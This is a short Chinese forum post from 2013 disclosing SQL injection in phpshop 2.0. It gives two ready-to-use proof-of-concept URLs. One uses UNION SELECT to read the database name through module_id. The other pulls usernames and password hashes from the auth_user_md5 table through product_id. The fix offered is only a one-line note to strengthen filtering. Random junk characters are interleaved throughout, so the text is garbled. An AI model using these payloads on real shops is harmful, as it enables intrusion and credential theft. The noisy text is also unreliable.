标题 : phpshop 2.0 SQL Injection Vulnerability" Y( _% f2 f6 R" o
4 r6 {) Z, s# X' `/ G* O0 {
作者 : By onestree8 R1 s1 U3 E) b2 J
下载地址 : http://code.google.com/p/phpshop/downloads/list3 w2 L& ?% m- W3 [' j
测试地址: windows 7 / ubuntu% l8 M# [% U( o! n
+ P8 ^: h! k$ Y& `, o2 Y
, U$ x) x, o& D! s; y
SQLi p0c:
2 y5 }1 W/ w1 ?! ^" ]5 C
# ?/ E* W1 O; I2 m3 ?% C==================
% |, a B' z! y c5 u3 m( U " S: S5 M% p+ c, d! G, h
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
% ]& ]# z7 z0 ^- R+ U9 O6 O, Nunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
) j2 s( O! _0 v, A
+ Z' Z- G9 p2 M# m: h7 ?http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
4 e7 k# ]) N2 t# X" I' \( p
9 R/ W9 d& W, @/ g/ i) Z修复:) J: R0 T/ o6 |/ `6 [# m: m# X
加强过滤: t# W( |4 u- _% U1 |# x
# n/ ~! n$ b" b/ d! h
& S7 O4 s. i7 L9 [ |
发表于 2013-1-18 18:24:10
收藏
支持
反对